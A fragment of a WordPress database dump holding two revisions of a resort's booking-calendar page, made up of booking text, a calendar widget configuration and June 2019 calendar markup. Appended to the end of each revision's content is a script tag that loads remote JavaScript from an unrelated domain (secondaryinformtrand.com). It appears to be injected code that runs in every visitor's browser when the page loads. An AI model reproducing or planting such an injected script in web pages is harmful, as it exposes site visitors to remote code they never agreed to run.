20:19:36','2019-06-14 01:19:36','<div id=\"pl-88\"  class=\"panel-layout\" ><div id=\"pg-88-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-88-0-0\"  class=\"panel-grid-cell\"  data-weight=\"0.772790055249\" ><div id=\"panel-88-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">CALL FOR AVAILABILITY 218-747-2959.</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar is not up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n		<script>\r\n			var wpdevartBooking1 = {\r\n				booking_id : 1,\r\n				hours_enabled : 0,\r\n				booking_widget : 0,\r\n				show_day_info_on_hover : 0,\r\n				cal_animation_type : \"\",\r\n				booking_widget : 0,\r\n				total : \"Total\",\r\n				price : \"Price\",\r\n				offset : 0,\r\n				position : \"after\",\r\n				night : 0,\r\n				id : 1,\r\n				capcha_error : \"Was not verified by recaptcha\",\r\n				conditions : \'\',\r\n				hours_conditions : \'\',\r\n				hide_price : 0,\r\n				max_item : \"\",\r\n				error_days : \"There are no services available for the period you selected.\",\r\n				error_night : \"You must select at least two days\",\r\n				min : \"1\",\r\n				max : \"1000\",\r\n				min_hour : \"1\",\r\n				max_hour : \"1000\",\r\n				error_min_day : \"You must select at least 1 days\",\r\n				error_max_day : \"You must select  more than 1000 days\",\r\n				error_min_hour : \"You must select at least 1 hour\",\r\n				error_max_hour : \"You must select  more than 1000 hour\",\r\n				error_day : \"There are no services available for this day.\"\r\n			};\r\n		</script>\r\n		</style><div id=\'booking_calendar_main_container_1\' class=\'booking_calendar_main_container    \' data-total=\'Total\' data-price=\'Price\' data-offset=\'0\' data-position=\'after\' data-night=\'0\' data-id=\'1\' data-booking_id=\'1\'><div class=\'booking_calendar_container\' id=\'booking_calendar_container_1\'><div class=\'wpdevart-load-overlay\'><div class=\'wpdevart-load-image\'><i class=\'fa fa-spinner fa-spin\'></i></div></div><div class=\'error_text_container div-for-clear\'><span class=\'error_text\'></span><span class=\'notice_text_close\'><i class=\'fa fa-close\'></i></span></div><div class=\'booking_calendar_main\'><div class=\"wpda-booking-calendar-head \"><div class=\"wpda-previous\"><a href=\"?date=2019-05\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span><</span><span class=\"wpda-month-name\"> May </span></a></div><div class=\"current-date-info\"><a href=\"?date=2018-06\" rel=\"nofollow, noindex\" class=\"wpdevart_link prev_year_info\"><</a><span class=\"wpda-current-year\">2019</span><a href=\"?date=2020-06-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link next_year_info\">></a>&nbsp;<span class=\"wpda-current-month\">June</span></div><div class=\"wpda-next\"><a href=\"?date=2019-07-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span class=\"wpda-month-name\"> Jul </span><span>></span></a></div></div><div class=\"wpdevart-calendar-container div-for-clear\"><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name week-start\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Monday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Tuesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Wednesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Thursday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Friday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Saturday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Sunday</div></div></div><div data-date=\"2019-05-27\" data-dateformat=\"May 27, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 27</div></div></div><div data-date=\"2019-05-28\" data-dateformat=\"May 28, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 28</div></div></div><div data-date=\"2019-05-29\" data-dateformat=\"May 29, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 29</div></div></div><div data-date=\"2019-05-30\" data-dateformat=\"May 30, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 30</div></div></div><div data-date=\"2019-05-31\" data-dateformat=\"May 31, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 31</div></div></div><div data-date=\"2019-06-01\" data-dateformat=\"June 1, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">1</div></div></div><div data-date=\"2019-06-02\" data-dateformat=\"June 2, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">2</div></div></div><div data-date=\"2019-06-03\" data-dateformat=\"June 3, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">3</div></div></div><div data-date=\"2019-06-04\" data-dateformat=\"June 4, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">4</div></div></div><div data-date=\"2019-06-05\" data-dateformat=\"June 5, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">5</div></div></div><div data-date=\"2019-06-06\" data-dateformat=\"June 6, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">6</div></div></div><div data-date=\"2019-06-07\" data-dateformat=\"June 7, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">7</div></div></div><div data-date=\"2019-06-08\" data-dateformat=\"June 8, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">8</div></div></div><div data-date=\"2019-06-09\" data-dateformat=\"June 9, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">9</div></div></div><div data-date=\"2019-06-10\" data-dateformat=\"June 10, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">10</div></div></div><div data-date=\"2019-06-11\" data-dateformat=\"June 11, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">11</div></div></div><div data-date=\"2019-06-12\" data-dateformat=\"June 12, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">12</div></div></div><div data-date=\"2019-06-13\" data-dateformat=\"June 13, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">13</div></div></div><div data-date=\"2019-06-14\" data-dateformat=\"June 14, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day current-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">14</div></div></div><div data-date=\"2019-06-15\" data-dateformat=\"June 15, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">15</div></div></div><div data-date=\"2019-06-16\" data-dateformat=\"June 16, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">16</div></div></div><div data-date=\"2019-06-17\" data-dateformat=\"June 17, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">17</div></div></div><div data-date=\"2019-06-18\" data-dateformat=\"June 18, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">18</div></div></div><div data-date=\"2019-06-19\" data-dateformat=\"June 19, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">19</div></div></div><div data-date=\"2019-06-20\" data-dateformat=\"June 20, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">20</div></div></div><div data-date=\"2019-06-21\" data-dateformat=\"June 21, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">21</div></div></div><div data-date=\"2019-06-22\" data-dateformat=\"June 22, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">22</div></div></div><div data-date=\"2019-06-23\" data-dateformat=\"June 23, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">23</div></div></div><div data-date=\"2019-06-24\" data-dateformat=\"June 24, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">24</div></div></div><div data-date=\"2019-06-25\" data-dateformat=\"June 25, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">25</div></div></div><div data-date=\"2019-06-26\" data-dateformat=\"June 26, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">26</div></div></div><div data-date=\"2019-06-27\" data-dateformat=\"June 27, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">27</div></div></div><div data-date=\"2019-06-28\" data-dateformat=\"June 28, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">28</div></div></div><div data-date=\"2019-06-29\" data-dateformat=\"June 29, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">29</div></div></div><div data-date=\"2019-06-30\" data-dateformat=\"June 30, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">30</div></div></div></div><div class=\"wpdevart-hours-container\"  ><div class=\"wpdevart-hours-overlay\"><div class=\"wpdevart-load-image\"><i class=\"fa fa-spinner fa-spin\"></i></div></div><div class=\"wpdevart-hours\"></div></div><div class=\"wpdevart-booking-legends div-for-clear\"><div class=\"wpdevart-legends-available\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Available</div></div><div class=\"wpdevart-legends-pending\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Booked</div></div><div class=\"wpdevart-legends-unavailable\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Unavailable</div></div></div></div></div></div></div>\n		</div></div><div id=\"pgc-88-0-1\"  class=\"panel-grid-cell\"  data-weight=\"0.227209944751\" ><div id=\"panel-88-0-1-0\" class=\"so-panel widget widget_bookingwidget panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" >[siteorigin_widget class=\"BookingWidget\"]<input type=\"hidden\" value=\"{&quot;instance&quot;:{&quot;booking_widget_title&quot;:&quot;&quot;,&quot;booking_widget_show&quot;:&quot;booking_form&quot;,&quot;booking_widget_calendar_count&quot;:&quot;1&quot;,&quot;booking_widget_last_field&quot;:&quot;&quot;,&quot;booking_widget_type&quot;:&quot;&quot;,&quot;so_sidebar_emulator_id&quot;:&quot;bookingwidget-83210001&quot;,&quot;option_name&quot;:&quot;widget_bookingwidget&quot;},&quot;args&quot;:{&quot;before_widget&quot;:&quot;&lt;div id=\\&quot;panel-88-0-1-0\\&quot; class=\\&quot;so-panel widget widget_bookingwidget panel-first-child panel-last-child\\&quot; data-index=\\&quot;1\\&quot; data-style=\\&quot;{&amp;quot;background_display&amp;quot;:&amp;quot;tile&amp;quot;}\\&quot; &gt;&quot;,&quot;after_widget&quot;:&quot;&lt;\\/div&gt;&quot;,&quot;before_title&quot;:&quot;&lt;h3 class=\\&quot;widget-title\\&quot;&gt;&quot;,&quot;after_title&quot;:&quot;&lt;\\/h3&gt;&quot;,&quot;widget_id&quot;:&quot;widget-0-1-0&quot;}}\" />[/siteorigin_widget]</div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','inherit','closed','closed','','88-revision-v1','','','2019-06-13 20:19:36','2019-06-14 01:19:36','',88,'http://ashbyresort.com/88-revision-v1/',0,'revision','',0),(833,2,'2019-06-13 20:19:36','2019-06-14 01:19:36','<div id=\"pl-88\"  class=\"panel-layout\" ><div id=\"pg-88-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-88-0-0\"  class=\"panel-grid-cell\"  data-weight=\"0.772790055249\" ><div id=\"panel-88-0-0-0\" class=\"so-panel widget widget_text panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">CALL FOR AVAILABILITY 218-747-2959.</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar is not up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n		<script>\r\n			var wpdevartBooking2 = {\r\n				booking_id : 2,\r\n				hours_enabled : 0,\r\n				booking_widget : 0,\r\n				show_day_info_on_hover : 0,\r\n				cal_animation_type : \"\",\r\n				booking_widget : 0,\r\n				total : \"Total\",\r\n				price : \"Price\",\r\n				offset : 0,\r\n				position : \"after\",\r\n				night : 0,\r\n				id : 1,\r\n				capcha_error : \"Was not verified by recaptcha\",\r\n				conditions : \'\',\r\n				hours_conditions : \'\',\r\n				hide_price : 0,\r\n				max_item : \"\",\r\n				error_days : \"There are no services available for the period you selected.\",\r\n				error_night : \"You must select at least two days\",\r\n				min : \"1\",\r\n				max : \"1000\",\r\n				min_hour : \"1\",\r\n				max_hour : \"1000\",\r\n				error_min_day : \"You must select at least 1 days\",\r\n				error_max_day : \"You must select  more than 1000 days\",\r\n				error_min_hour : \"You must select at least 1 hour\",\r\n				error_max_hour : \"You must select  more than 1000 hour\",\r\n				error_day : \"There are no services available for this day.\"\r\n			};\r\n		</script>\r\n		</style><div id=\'booking_calendar_main_container_2\' class=\'booking_calendar_main_container    \' data-total=\'Total\' data-price=\'Price\' data-offset=\'0\' data-position=\'after\' data-night=\'0\' data-id=\'1\' data-booking_id=\'2\'><div class=\'booking_calendar_container\' id=\'booking_calendar_container_2\'><div class=\'wpdevart-load-overlay\'><div class=\'wpdevart-load-image\'><i class=\'fa fa-spinner fa-spin\'></i></div></div><div class=\'error_text_container div-for-clear\'><span class=\'error_text\'></span><span class=\'notice_text_close\'><i class=\'fa fa-close\'></i></span></div><div class=\'booking_calendar_main\'><div class=\"wpda-booking-calendar-head \"><div class=\"wpda-previous\"><a href=\"?date=2019-05\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span><</span><span class=\"wpda-month-name\"> May </span></a></div><div class=\"current-date-info\"><a href=\"?date=2018-06\" rel=\"nofollow, noindex\" class=\"wpdevart_link prev_year_info\"><</a><span class=\"wpda-current-year\">2019</span><a href=\"?date=2020-06-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link next_year_info\">></a>&nbsp;<span class=\"wpda-current-month\">June</span></div><div class=\"wpda-next\"><a href=\"?date=2019-07-01\" rel=\"nofollow, noindex\" class=\"wpdevart_link\"><span class=\"wpda-month-name\"> Jul </span><span>></span></a></div></div><div class=\"wpdevart-calendar-container div-for-clear\"><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name week-start\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Monday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Tuesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Wednesday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Thursday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Friday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Saturday</div></div></div><div data-date=\"\" data-dateformat=\"January 1, 1970\" data-currency=\"&#36;\"  class=\"week-day-name\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">Sunday</div></div></div><div data-date=\"2019-05-27\" data-dateformat=\"May 27, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 27</div></div></div><div data-date=\"2019-05-28\" data-dateformat=\"May 28, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 28</div></div></div><div data-date=\"2019-05-29\" data-dateformat=\"May 29, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 29</div></div></div><div data-date=\"2019-05-30\" data-dateformat=\"May 30, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 30</div></div></div><div data-date=\"2019-05-31\" data-dateformat=\"May 31, 2019\" data-currency=\"&#36;\"  class=\"past-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">May 31</div></div></div><div data-date=\"2019-06-01\" data-dateformat=\"June 1, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">1</div></div></div><div data-date=\"2019-06-02\" data-dateformat=\"June 2, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">2</div></div></div><div data-date=\"2019-06-03\" data-dateformat=\"June 3, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">3</div></div></div><div data-date=\"2019-06-04\" data-dateformat=\"June 4, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">4</div></div></div><div data-date=\"2019-06-05\" data-dateformat=\"June 5, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">5</div></div></div><div data-date=\"2019-06-06\" data-dateformat=\"June 6, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">6</div></div></div><div data-date=\"2019-06-07\" data-dateformat=\"June 7, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">7</div></div></div><div data-date=\"2019-06-08\" data-dateformat=\"June 8, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">8</div></div></div><div data-date=\"2019-06-09\" data-dateformat=\"June 9, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">9</div></div></div><div data-date=\"2019-06-10\" data-dateformat=\"June 10, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">10</div></div></div><div data-date=\"2019-06-11\" data-dateformat=\"June 11, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">11</div></div></div><div data-date=\"2019-06-12\" data-dateformat=\"June 12, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">12</div></div></div><div data-date=\"2019-06-13\" data-dateformat=\"June 13, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day past-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">13</div></div></div><div data-date=\"2019-06-14\" data-dateformat=\"June 14, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day current-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">14</div></div></div><div data-date=\"2019-06-15\" data-dateformat=\"June 15, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">15</div></div></div><div data-date=\"2019-06-16\" data-dateformat=\"June 16, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">16</div></div></div><div data-date=\"2019-06-17\" data-dateformat=\"June 17, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">17</div></div></div><div data-date=\"2019-06-18\" data-dateformat=\"June 18, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">18</div></div></div><div data-date=\"2019-06-19\" data-dateformat=\"June 19, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">19</div></div></div><div data-date=\"2019-06-20\" data-dateformat=\"June 20, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">20</div></div></div><div data-date=\"2019-06-21\" data-dateformat=\"June 21, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">21</div></div></div><div data-date=\"2019-06-22\" data-dateformat=\"June 22, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">22</div></div></div><div data-date=\"2019-06-23\" data-dateformat=\"June 23, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">23</div></div></div><div data-date=\"2019-06-24\" data-dateformat=\"June 24, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">24</div></div></div><div data-date=\"2019-06-25\" data-dateformat=\"June 25, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">25</div></div></div><div data-date=\"2019-06-26\" data-dateformat=\"June 26, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">26</div></div></div><div data-date=\"2019-06-27\" data-dateformat=\"June 27, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">27</div></div></div><div data-date=\"2019-06-28\" data-dateformat=\"June 28, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">28</div></div></div><div data-date=\"2019-06-29\" data-dateformat=\"June 29, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">29</div></div></div><div data-date=\"2019-06-30\" data-dateformat=\"June 30, 2019\" data-currency=\"&#36;\"  class=\"current-month-day wpdevart-day weekend available-day\"><div class=\"wpda-day-header div-for-clear\"><div class=\"wpda-day-number\">30</div></div></div></div><div class=\"wpdevart-hours-container\"  ><div class=\"wpdevart-hours-overlay\"><div class=\"wpdevart-load-image\"><i class=\"fa fa-spinner fa-spin\"></i></div></div><div class=\"wpdevart-hours\"></div></div><div class=\"wpdevart-booking-legends div-for-clear\"><div class=\"wpdevart-legends-available\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Available</div></div><div class=\"wpdevart-legends-pending\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Booked</div></div><div class=\"wpdevart-legends-unavailable\"><div class=\"legend-text\"><span class=\"legend-div\"></span>-Unavailable</div></div></div></div></div></div></div>\n		</div></div><div id=\"pgc-88-0-1\"  class=\"panel-grid-cell\"  data-weight=\"0.227209944751\" ><div id=\"panel-88-0-1-0\" class=\"so-panel widget widget_bookingwidget panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" >[siteorigin_widget class=\"BookingWidget\"]<input type=\"hidden\" value=\"{&quot;instance&quot;:{&quot;booking_widget_title&quot;:&quot;&quot;,&quot;booking_widget_show&quot;:&quot;booking_form&quot;,&quot;booking_widget_calendar_count&quot;:&quot;1&quot;,&quot;booking_widget_last_field&quot;:&quot;&quot;,&quot;booking_widget_type&quot;:&quot;&quot;,&quot;so_sidebar_emulator_id&quot;:&quot;bookingwidget-8810001&quot;,&quot;option_name&quot;:&quot;widget_bookingwidget&quot;},&quot;args&quot;:{&quot;before_widget&quot;:&quot;&lt;div id=\\&quot;panel-88-0-1-0\\&quot; class=\\&quot;so-panel widget widget_bookingwidget panel-first-child panel-last-child\\&quot; data-index=\\&quot;1\\&quot; data-style=\\&quot;{&amp;quot;background_display&amp;quot;:&amp;quot;tile&amp;quot;}\\&quot; &gt;&quot;,&quot;after_widget&quot;:&quot;&lt;\\/div&gt;&quot;,&quot;before_title&quot;:&quot;&lt;h3 class=\\&quot;widget-title\\&quot;&gt;&quot;,&quot;after_title&quot;:&quot;&lt;\\/h3&gt;&quot;,&quot;widget_id&quot;:&quot;widget-0-1-0&quot;}}\" />[/siteorigin_widget]</div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','inherit','closed','closed','','88-revision-v1','','','2019-06-13 20:19:36','2019-06-14 